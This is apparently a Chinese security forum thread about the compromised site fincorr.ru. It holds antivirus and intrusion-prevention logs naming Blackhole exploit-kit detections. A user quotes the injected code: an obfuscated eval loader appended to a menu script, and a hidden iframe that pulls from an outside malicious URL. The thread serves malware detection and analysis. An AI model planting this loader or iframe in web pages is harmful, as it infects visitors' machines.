http://fincorr.ru/

firefox3

2013/4/3        13:58:28        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8T3JKM83\fincorr_ru[1].htm\00000407.js        JS/Exploit-Blacole.fr (特洛伊)

2013/4/3        13:58:32        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0GOL6OM3\ui.widget[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:32        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0GOL6OM3\ui.core[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:32        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22AZ1YO4\shortcodes[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:33        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22AZ1YO4\superfish[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:33        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6I9UOVVT\general[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:33        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22AZ1YO4\ui.tabs[1].js        JS/Exploit-Blacole.eu (特洛伊)

2013/4/3        13:58:33        已删除         l\Q        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\Q\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0GOL6OM3\jquery[1].js        JS/Exploit-Blacole.eu (特洛伊)

wjcharles

NIS。。。。。


类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/4/3 14:21:46,高,阻止了 fincorr.ru 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website,不需要操作,不需要操作,"fincorr.ru (195.208.1.115, 80)",fincorr.ru/,"XXX-PC (222.XXX.XXX.XXX, 4872)",195.208.1.115 (195.208.1.115),"TCP, www-http"
来自 <b>fincorr.ru/</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。

蓝核

1. sfHover = function() {
   
2.         if (!document.getElementsByTagName) return false;
   
3.         var sfEls = document.getElementById("navigation").getElementsByTagName("li");
   
4.         for (var i=0; i<sfEls.length; i++) {
   
5.                 sfEls[i].onmouseover=function() {
   
6.                         this.className+=" sfhover";
   
7.                 }
   
8.                 sfEls[i].onmouseout=function() {
   
9.                         this.className=this.className.replace(new RegExp(" sfhover\\b"), "");
   
10.                 }
    
11.         }
    
12.        
    
13. }
    
14. if (window.attachEvent) window.attachEvent("onload", sfHover);
    
15. /*c3284d*/
    
16. try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);
    
17. /*/c3284d*/
    

复制代码

先mark……等我再来……

yyan

卡巴2013报了~

蓝核

1. 
   
2. function frmAdd() {
   
3. var ifrm = document.createElement('iframe');
   
4. ifrm.style.position='absolute';
   
5. ifrm.style.top='-999em';
   
6. ifrm.style.left='-999em';
   
7. ifrm.src  = "http://michaelmazur.net/xml.php";
   
8. ifrm.id = 'frmId';
   
9. document.body.appendChild(ifrm);
   
10. };
    
11. window.onload = frmAdd;

复制代码

zmzcy